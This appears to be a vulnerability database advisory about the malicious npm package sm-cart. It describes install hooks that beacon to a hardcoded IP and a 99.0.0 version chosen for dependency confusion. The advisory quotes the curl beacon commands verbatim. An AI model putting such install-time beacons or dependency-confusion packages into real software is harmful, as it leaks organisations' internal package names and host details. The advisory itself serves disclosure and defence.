VDB
EN

MAL-2026-14396

Malicious code in sm-cart (npm)

상세

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (14b02c7ed01f5b6da80999086ceced1c2eb8b8102384f6778862a0bb3ecaebe0) Package sm-cart@99.0.0 declares preinstall and postinstall scripts that unconditionally run `curl -s http://16.192.173.5/sm-cart/pre` and `curl -s http://16.192.173.5/sm-cart/post` on every install, causing the installing host to beacon over plain HTTP to a hardcoded bare-IP endpoint at install time. The package has no functional code (index.js only logs and exports an empty object), self-identifies in its manifest as a 'dependency confusion test', and uses an implausibly high version number (99.0.0) designed to win private-name resolution when an organization has an internal package also named 'sm-cart'. The result is that a build system whose internal 'sm-cart' resolves to this public package discloses the internal package name, the host's public IP, and successful installation to the operator of 16.192.173.5.

## Source: ossf-package-analysis (ad685443f9d918dd34a9c2f676f78850abaacb943b9562a773761627d1cad4af) The OpenSSF Package Analysis project identified 'sm-cart' @ 99.0.1 (npm) as malicious.

It is considered malicious because:

- The package executes one or more commands associated with malicious behavior.

이 버전이 영향받나요?

사용 중인 패키지 버전을 입력하면 즉시 평가합니다.

영향 패키지

npm / sm-cart

No fixed version published yet for sm-cart (npm). Pin to a known-safe version or switch to an alternative.

참고